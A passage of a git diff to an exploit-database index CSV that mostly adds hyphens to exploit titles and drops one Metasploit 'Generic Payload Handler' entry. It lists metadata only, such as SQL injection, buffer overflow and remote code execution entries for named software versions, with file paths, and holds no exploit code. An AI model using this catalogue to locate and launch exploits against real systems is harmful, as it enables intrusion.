(.wav) Buffer Overflow (seh)",2011-01-29,m0nna,windows,local,0 16074,platforms/php/webapps/16074.txt,"MultiCMS - Local File Inclusion",2011-01-29,R3VAN_BASTARD,php,webapps,0 @@ -13927,7 +13927,7 @@ id,file,description,date,author,platform,type,port 16084,platforms/windows/dos/16084.html,"Maxthon Browser 3.0.20.1000 - ref / replace DoS",2011-01-30,"Carlos Mario Penagos Hollmann",windows,dos,0 16272,platforms/php/webapps/16272.txt,"Limelight Software - (article.php) SQL Injection",2011-03-04,eXeSoul,php,webapps,0 16085,platforms/windows/local/16085.py,"AOL 9.5 - (rtx) Local Buffer Overflow Exploit",2011-01-31,sup3r,windows,local,0 -16086,platforms/linux/local/16086.txt,"OpenVAS Manager Command Injection",2011-01-31,"Tim Brown",linux,local,0 +16086,platforms/linux/local/16086.txt,"OpenVAS Manager - Command Injection",2011-01-31,"Tim Brown",linux,local,0 16088,platforms/php/webapps/16088.php,"NetLink - Arbitrary File Upload",2011-02-01,lumut--,php,webapps,0 16090,platforms/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 16091,platforms/php/webapps/16091.txt,"Joomla! 1.5 & 1.6 - JFilterInput XSS Bypass",2011-02-01,"Jeff Channell",php,webapps,0 @@ -13947,9 +13947,9 @@ id,file,description,date,author,platform,type,port 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 - (.rtx) Buffer Overflow",2011-02-03,sickness,windows,local,0 16108,platforms/multiple/dos/16108.txt,"VLC Media Player - Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0 16109,platforms/php/webapps/16109.txt,"podcast generator 1.3 - Multiple Vulnerabilities",2011-02-04,"High-Tech Bridge SA",php,webapps,0 -16113,platforms/php/webapps/16113.txt,"oscommerce authentication bypass",2011-02-04,"Nicolas Krassas",php,webapps,0 +16113,platforms/php/webapps/16113.txt,"oscommerce - authentication bypass",2011-02-04,"Nicolas Krassas",php,webapps,0 16114,platforms/php/webapps/16114.txt,"Chamilo 1.8.7 / Dokeos 1.8.6 - Remote File Disclosure",2011-02-05,beford,php,webapps,0 -16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 Full Info Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0 +16116,platforms/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Info Disclosure",2011-02-05,"Daniel Godoy",php,webapps,0 16117,platforms/php/webapps/16117.txt,"Escort und Begleitservice Agentur Script - SQL Injection",2011-02-05,NoNameMT,php,webapps,0 16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit",2011-02-06,kingcope,freebsd,local,0 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow DoS Skinfile",2011-02-06,badc0re,windows,dos,0 @@ -13980,11 +13980,11 @@ id,file,description,date,author,platform,type,port 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Script",2011-02-14,_84kur10_,php,webapps,0 16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Pre-Auth BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - XSS",2011-02-09,Sw1tCh,php,webapps,0 -16149,platforms/hardware/remote/16149.txt,"Linksys WAP610N Unauthenticated Root Access Security",2011-02-10,"Matteo Ignaccolo",hardware,remote,0 +16149,platforms/hardware/remote/16149.txt,"Linksys WAP610N - Unauthenticated Root Access Security",2011-02-10,"Matteo Ignaccolo",hardware,remote,0 16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - (TYPE) Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0 16152,platforms/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - Trivial SQL Injection",2011-02-10,anonymous,multiple,webapps,0 16153,platforms/windows/local/16153.py,"MoviePlay 4.82 - (.lst) Buffer Overflow",2011-02-11,sickness,windows,local,0 -16154,platforms/php/webapps/16154.txt,"Horde Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,php,webapps,0 +16154,platforms/php/webapps/16154.txt,"Horde - Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,php,webapps,0 16155,platforms/php/webapps/16155.txt,"Geomi CMS 1.2 & 3.0 - SQL Injection",2011-02-11,"ThunDEr HeaD",php,webapps,0 16156,platforms/php/webapps/16156.txt,"Kunena < 1.5.13 / < 1.6.3 - SQL Injection",2011-02-11,"Red Matter",php,webapps,0 16157,platforms/jsp/webapps/16157.py,"Openedit 5.1294 - Remote Code Execution Exploit",2011-02-11,mr_me,jsp,webapps,0 @@ -13999,7 +13999,7 @@ id,file,description,date,author,platform,type,port 16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow Exploit",2011-02-16,chap0,windows,remote,0 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow Exploit (SEH)",2011-02-15,badc0re,windows,local,0 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection",2011-02-15,"High-Tech Bridge SA",php,webapps,0 -16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Remote BoF (Post Auth)",2011-02-16,chap0,windows,remote,0 +16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Remote BoF (Post-Auth)",2011-02-16,chap0,windows,remote,0 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - (.csv) Denial of Service",2011-02-17,b0telh0,windows,dos,0 @@ -14007,9 +14007,9 @@ id,file,description,date,author,platform,type,port 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() NULL Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0 16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file - (avcenter.exe) Local Crash PoC",2011-02-19,KedAns-Dz,windows,dos,0 16204,platforms/windows/dos/16204.pl,"Solar FTP 2.1 - Denial of Service",2011-02-22,x000,windows,dos,0 -16190,platforms/windows/dos/16190.pl,"IBM Lotus Domino LDAP Bind Request Remote Code Execution",2011-02-18,"Francis Provencher",windows,dos,0 +16190,platforms/windows/dos/16190.pl,"IBM Lotus Domino LDAP - Bind Request Remote Code Execution",2011-02-18,"Francis Provencher",windows,dos,0 16191,platforms/windows/dos/16191.pl,"Novell ZenWorks 10 / 11 - TFTPD Remote Code Execution",2011-02-18,"Francis Provencher",windows,dos,0 -16192,platforms/linux/dos/16192.pl,"Novell Iprint LPD Remote Code Execution",2011-02-18,"Francis Provencher",linux,dos,0 +16192,platforms/linux/dos/16192.pl,"Novell Iprint - LPD Remote Code Execution",2011-02-18,"Francis Provencher",linux,dos,0 16254,platforms/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 - Heap Memory Corruption PoC",2011-02-28,LiquidWorm,windows,dos,0 16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS - SQL Injection",2011-02-24,p0pc0rn,cfm,webapps,0 16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0 @@ -14047,7 +14047,7 @@ id,file,description,date,author,platform,type,port 16236,platforms/php/webapps/16236.txt,"IWantOneButton 3.0.1 WordPress Plugin - Multiple Vulnerabilities",2011-02-24,"High-Tech Bridge SA",php,webapps,0 16237,platforms/windows/dos/16237.py,"Elecard MPEG Player 5.7 - Local Buffer Overflow PoC (SEH)",2011-02-24,badc0re,windows,dos,0 16238,platforms/hardware/remote/16238.txt,"iphone ishred 1.93 - Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote,0 -16239,platforms/hardware/remote/16239.txt,"iPhone Guitar Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote,0 +16239,platforms/hardware/remote/16239.txt,"iPhone Guitar - Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote,0 16240,platforms/hardware/remote/16240.txt,"iphone pdf reader pro 2.3 - Directory Traversal",2011-02-24,"Khashayar Fereidani",hardware,remote,0 16241,platforms/asp/webapps/16241.txt,"RaksoCT - Multiple SQL Injection",2011-02-25,p0pc0rn,asp,webapps,0 16242,platforms/windows/remote/16242.html,"Edraw Office Viewer Component 7.4 - ActiveX Stack Buffer Overflow",2011-02-25,"Alexander Gavrun",windows,remote,0 @@ -14056,11 +14056,11 @@ id,file,description,date,author,platform,type,port 16245,platforms/hardware/remote/16245.py,"iphone mydocs 2.7 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0 16246,platforms/php/webapps/16246.py,"Joomla XCloner Component (com_xcloner-backupandrestore) - Remote Command Execution",2011-02-25,mr_me,php,webapps,0 16247,platforms/php/webapps/16247.txt,"Pragyan CMS 3.0 - Multiple Vulnerabilities",2011-02-25,"Villy and Abhishek Lyall",php,webapps,0 -16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 NULL Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0 +16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - NULL Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0 16249,platforms/php/webapps/16249.txt,"phreebooks r30rc4 - Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps,0 16250,platforms/php/webapps/16250.txt,"jQuery Mega Menu 1.0 WordPress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 16251,platforms/php/webapps/16251.txt,"OPS Old Post Spinner 2.2.1 WordPress Plugin - LFI",2011-02-26,"AutoSec Tools",php,webapps,0 -16252,platforms/hardware/webapps/16252.html,"Linksys Cisco WAG120N CSRF",2011-02-26,"Khashayar Fereidani",hardware,webapps,0 +16252,platforms/hardware/webapps/16252.html,"Linksys Cisco WAG120N - CSRF",2011-02-26,"Khashayar Fereidani",hardware,webapps,0 16255,platforms/windows/dos/16255.pl,"Magic Music Editor - (.cda) Denial of Service",2011-02-28,"AtT4CKxT3rR0r1ST ",windows,dos,0 16256,platforms/php/webapps/16256.txt,"DO-CMS - Multiple SQL Injection",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 16257,platforms/php/webapps/16257.txt,"SnapProof - (page.php) SQL Injection",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -14070,7 +14070,7 @@ id,file,description,date,author,platform,type,port 16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation PoC (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0 16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0 16265,platforms/php/webapps/16265.txt,"Readmore Systems Script - SQL Injection",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0 -16266,platforms/php/webapps/16266.txt,"Quicktech SQL Injection",2011-03-02,eXeSoul,php,webapps,0 +16266,platforms/php/webapps/16266.txt,"Quicktech - SQL Injection",2011-03-02,eXeSoul,php,webapps,0 16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0 16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 @@ -14088,7 +14088,6 @@ id,file,description,date,author,platform,type,port 16285,platforms/linux/remote/16285.rb,"NTP daemon readvar Buffer Overflow",2010-08-25,Metasploit,linux,remote,0 16286,platforms/multiple/remote/16286.rb,"RealServer Describe Buffer Overflow",2010-08-07,Metasploit,multiple,remote,0 16287,platforms/multiple/remote/16287.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution",2010-11-11,Metasploit,multiple,remote,0 -16288,platforms/multiple/remote/16288.rb,"Generic Payload Handler",2011-02-28,Metasploit,multiple,remote,0 16289,platforms/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow",2010-02-11,Metasploit,linux,remote,0 16290,platforms/multiple/remote/16290.rb,"VERITAS NetBackup - Remote Command Execution",2010-10-09,Metasploit,multiple,remote,0 16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution",2010-09-20,Metasploit,multiple,remote,0 @@ -14100,11 +14099,11 @@ id,file,description,date,author,platform,type,port 16297,platforms/multiple/remote/16297.rb,"Java - Statement.invoke() Trusted Method Chain Exploit",2010-12-15,Metasploit,multiple,remote,0 16298,platforms/multiple/remote/16298.rb,"Sun Java - JRE AWT setDiffICM Buffer Overflow",2010-09-20,Metasploit,multiple,remote,0 16299,platforms/multiple/remote/16299.rb,"Firefox 3.5 - escape() Return Value Memory Corruption",2010-09-20,Metasploit,multiple,remote,0 -16300,platforms/multiple/remote/16300.rb,"Mozilla Suite/Firefox Navigator Object Code Execution",2010-09-20,Metasploit,multiple,remote,0 +16300,platforms/multiple/remote/16300.rb,"Mozilla Suite/Firefox - Navigator Object Code Execution",2010-09-20,Metasploit,multiple,remote,0 16301,platforms/multiple/remote/16301.rb,"Firefox - location.QueryInterface() Code Execution",2010-09-20,Metasploit,multiple,remote,0 16302,platforms/multiple/remote/16302.rb,"Signed Applet Social Engineering - Code Execuction",2011-01-08,Metasploit,multiple,remote,0 16303,platforms/multiple/remote/16303.rb,"Opera 9 - Configuration Overwrite",2010-07-27,Metasploit,multiple,remote,0 -16304,platforms/multiple/remote/16304.rb,"Opera historysearch XSS",2010-11-11,Metasploit,multiple,remote,0 +16304,platforms/multiple/remote/16304.rb,"Opera historysearch - XSS",2010-11-11,Metasploit,multiple,remote,0 16305,platforms/multiple/remote/16305.rb,"Java - RMIConnectionImpl Deserialization Privilege Escalation Exploit",2010-09-27,Metasploit,multiple,remote,0 16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution",2010-09-20,Metasploit,windows,remote,0 16307,platforms/multiple/local/16307.rb,"PeaZip 2.6.1 - Zip Processing Command Injection",2010-09-20,Metasploit,multiple,local,0 @@ -14118,12 +14117,12 @@ id,file,description,date,author,platform,type,port 16315,platforms/multiple/remote/16315.rb,"Axis2 - / SAP BusinessObjects Authenticated Code Execution (via SOAP)",2010-12-14,Metasploit,multiple,remote,0 16316,platforms/multiple/remote/16316.rb,"JBoss Java Class DeploymentFileRepository WAR deployment",2010-08-03,Metasploit,multiple,remote,0 16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager Application Deployer - Authenticated Code Execution",2010-12-14,Metasploit,multiple,remote,0 -16318,platforms/multiple/remote/16318.rb,"JBoss JMX Console Deployer Upload and Execute",2010-10-19,Metasploit,multiple,remote,0 -16319,platforms/multiple/remote/16319.rb,"JBoss JMX Console Beanshell Deployer WAR upload and deployment",2011-01-10,Metasploit,multiple,remote,0 +16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute",2010-10-19,Metasploit,multiple,remote,0 +16319,platforms/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR upload and deployment",2011-01-10,Metasploit,multiple,remote,0 16320,platforms/unix/remote/16320.rb,"Samba - 'username map script' Command Execution",2010-08-18,Metasploit,unix,remote,0 16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow",2010-04-28,Metasploit,linux,remote,0 16322,platforms/solaris/remote/16322.rb,"Solaris LPD - Command Execution",2010-09-20,Metasploit,solaris,remote,0 -16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd Heap Overflow",2010-04-30,Metasploit,solaris_sparc,remote,0 +16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd - Heap Overflow",2010-04-30,Metasploit,solaris_sparc,remote,0 16324,platforms/multiple/remote/16324.rb,"Solaris sadmind - Command Execution",2010-06-22,Metasploit,multiple,remote,0 16325,platforms/solaris/remote/16325.rb,"Sun Solaris sadmind - adm_build_path() Buffer Overflow",2010-07-03,Metasploit,solaris,remote,0 16326,platforms/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0 @@ -14132,7 +14131,7 @@ id,file,description,date,author,platform,type,port 16329,platforms/solaris/remote/16329.rb,"Samba - lsa_io_trans_names Heap Overflow (Solaris)",2010-04-05,Metasploit,solaris,remote,0 16330,platforms/solaris_sparc/remote/16330.rb,"Samba - trans2open Overflow (Solaris SPARC)",2010-06-21,Metasploit,solaris_sparc,remote,0 16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service Overflow",2010-06-22,Metasploit,windows,remote,0 -16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows Remote Agent Overflow",2010-07-03,Metasploit,windows,remote,0 +16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows - Remote Agent Overflow",2010-07-03,Metasploit,windows,remote,0 16333,platforms/windows/remote/16333.rb,"Windows Media Services - ConnectFunnel Stack Buffer Overflow",2010-04-28,Metasploit,windows,remote,0 16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow",2010-09-20,Metasploit,windows,remote,0 16335,platforms/windows/remote/16335.rb,"WinComLPD 3.0.2 - Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 @@ -14141,7 +14140,7 @@ id,file,description,date,author,platform,type,port 16338,platforms/windows/remote/16338.rb,"SAP SAPLPD 6.28 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16339,platforms/windows/remote/16339.rb,"Timbuktu Pro - Directory Traversal/File Upload",2010-11-24,Metasploit,windows,remote,0 16340,platforms/windows/remote/16340.rb,"Oracle 8i TNS Listener - (ARGUMENTS) Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 -16341,platforms/windows/remote/16341.rb,"Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 +16341,platforms/windows/remote/16341.rb,"Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16342,platforms/windows/remote/16342.rb,"Oracle 10gR2 - TNS Listener AUTH_SESSKEY Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16343,platforms/windows/remote/16343.rb,"Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16344,platforms/windows/remote/16344.rb,"FutureSoft TFTP Server 2000 - Transfer-Mode Overflow",2010-05-09,Metasploit,windows,remote,0 @@ -14164,8 +14163,8 @@ id,file,description,date,author,platform,type,port 16361,platforms/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061)",2011-02-17,Metasploit,windows,remote,0 16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,Metasploit,windows,remote,0 16363,platforms/windows/remote/16363.rb,"Microsoft Windows - SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,Metasploit,windows,remote,0 -16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service Overflow",2010-05-09,Metasploit,windows,remote,0 -16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service Overflow",2010-08-30,Metasploit,windows,dos,0 +16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service - Overflow",2010-05-09,Metasploit,windows,remote,0 +16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow",2010-08-30,Metasploit,windows,dos,0 16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow (SMB)",2010-09-28,Metasploit,windows,remote,0 16367,platforms/windows/remote/16367.rb,"Microsoft Server Service - NetpwPathCanonicalize Overflow",2011-02-17,Metasploit,windows,remote,0 16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow",2010-07-03,Metasploit,windows,remote,0 @@ -14185,11 +14184,11 @@ id,file,description,date,author,platform,type,port 16382,platforms/windows/remote/16382.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow",2010-11-30,Metasploit,windows,remote,0 16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow",2010-11-30,Metasploit,windows,remote,0 16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 -16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow",2010-07-03,Metasploit,windows,remote,0 -16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver Probe Response SSID Overflow",2010-07-03,Metasploit,hardware,remote,0 +16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow",2010-07-03,Metasploit,hardware,remote,0 16388,platforms/hardware/remote/16388.rb,"NetGear WG111v2 Wireless Driver - Long Beacon Overflow",2010-07-03,Metasploit,hardware,remote,0 -16389,platforms/windows/remote/16389.rb,"Omni-NFS Server Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 +16389,platforms/windows/remote/16389.rb,"Omni-NFS Server - Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16390,platforms/windows/remote/16390.rb,"Energizer DUO Trojan Code Execution",2010-09-20,Metasploit,windows,remote,0 16391,platforms/windows/remote/16391.rb,"EMC AlphaStor Agent Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16392,platforms/windows/remote/16392.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption",2011-01-24,Metasploit,windows,remote,0 @@ -14202,9 +14201,9 @@ id,file,description,date,author,platform,type,port 16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (1)",2010-05-09,Metasploit,windows,remote,0 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve - Message Engine Heap Overflow",2010-04-30,Metasploit,windows,remote,0 -16402,platforms/windows/remote/16402.rb,"CA BrightStor HSM Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16402,platforms/windows/remote/16402.rb,"CA BrightStor - HSM Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16403,platforms/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL Overflow",2010-04-30,Metasploit,windows,remote,0 -16404,platforms/windows/remote/16404.rb,"Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16404,platforms/windows/remote/16404.rb,"Computer Associates ARCserve - REPORTREMOTEEXECUTECML Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16405,platforms/windows/remote/16405.rb,"CA BrightStor Universal Agent Overflow",2010-06-22,Metasploit,windows,remote,0 16406,platforms/windows/remote/16406.rb,"CA BrightStor Discovery Service - Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16407,platforms/windows/remote/16407.rb,"CA BrightStor ARCserve - Tape Engine Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 @@ -14215,7 +14214,7 @@ id,file,description,date,author,platform,type,port 16412,platforms/windows/remote/16412.rb,"CA BrightStor ARCserve Message Engine 0x72 - Buffer Overflow",2010-10-05,Metasploit,windows,remote,0 16413,platforms/windows/remote/16413.rb,"CA BrightStor ArcServe - Media Service Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 16414,platforms/windows/remote/16414.rb,"CA BrightStor ARCserve License Service - GCR NETWORK Buffer Overflow",2010-11-03,Metasploit,windows,remote,0 -16415,platforms/windows/remote/16415.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow",2011-03-10,Metasploit,windows,remote,0 +16415,platforms/windows/remote/16415.rb,"CA BrightStor - ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow",2011-03-10,Metasploit,windows,remote,0 16416,platforms/windows/remote/16416.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Multiple Commands Buffer Overflow",2010-11-04,Metasploit,windows,remote,0 16417,platforms/windows/remote/16417.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (1)",2010-10-05,Metasploit,windows,remote,0 16418,platforms/windows/remote/16418.rb,"CA BrightStor ARCserve - Message Engine Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 @@ -14229,7 +14228,7 @@ id,file,description,date,author,platform,type,port 16426,platforms/windows/remote/16426.rb,"BigAnt Server 2.52 - USV Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16427,platforms/windows/remote/16427.rb,"Windows RSH daemon - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16428,platforms/windows/remote/16428.rb,"IBM Tivoli Storage Manager Express RCA Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16429,platforms/windows/remote/16429.rb,"HP OpenView Operations OVTrace Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 +16429,platforms/windows/remote/16429.rb,"HP OpenView - Operations OVTrace Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 16430,platforms/windows/remote/16430.rb,"BigAnt Server 2.2 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16431,platforms/windows/remote/16431.rb,"BigAnt Server 2.50 SP1 - Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16432,platforms/windows/remote/16432.rb,"Firebird Relational Database - isc_create_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 @@ -14250,13 +14249,13 @@ id,file,description,date,author,platform,type,port 16447,platforms/windows/remote/16447.rb,"Borland InterBase - isc_attach_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16448,platforms/windows/remote/16448.rb,"BakBone NetVault - Remote Heap Overflow",2010-09-20,Metasploit,windows,remote,0 16449,platforms/windows/remote/16449.rb,"Borland InterBase - SVC_attach() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 -16450,platforms/windows/remote/16450.rb,"DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow",2010-07-03,Metasploit,windows,remote,0 +16450,platforms/windows/remote/16450.rb,"DoubleTake/HP StorageWorks Storage Mirroring Service - Authentication Overflow",2010-07-03,Metasploit,windows,remote,0 16451,platforms/windows/remote/16451.rb,"eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow",2010-09-20,Metasploit,windows,remote,0 -16452,platforms/windows/remote/16452.rb,"AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow",2010-05-11,Metasploit,windows,remote,0 +16452,platforms/windows/remote/16452.rb,"AgentX++ Master - AgentX::receive_agentx Stack Buffer Overflow",2010-05-11,Metasploit,windows,remote,0 16453,platforms/windows/remote/16453.rb,"Borland Interbase - Create-Request Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16454,platforms/windows/remote/16454.rb,"ShixxNOTE 6.net - Font Field Overflow",2010-06-15,Metasploit,windows,remote,0 16455,platforms/windows/remote/16455.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (2)",2010-09-20,Metasploit,windows,remote,0 -16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 +16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist - Buffer Overflow",2010-11-24,Metasploit,windows,remote,0 16457,platforms/windows/remote/16457.rb,"LANDesk Management Suite 8.7 - Alert Service Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow",2010-11-30,Metasploit,windows,remote,0 16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 @@ -14287,7 +14286,7 @@ id,file,description,date,author,platform,type,port 16484,platforms/windows/remote/16484.rb,"Mercury/32 4.01a - IMAP RENAME Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16485,platforms/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16486,platforms/windows/remote/16486.rb,"Novell NetMail 3.52d - IMAP AUTHENTICATE Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16487,platforms/windows/remote/16487.rb,"Ipswitch IMail IMAP SEARCH Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 +16487,platforms/windows/remote/16487.rb,"Ipswitch IMail - IMAP SEARCH Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 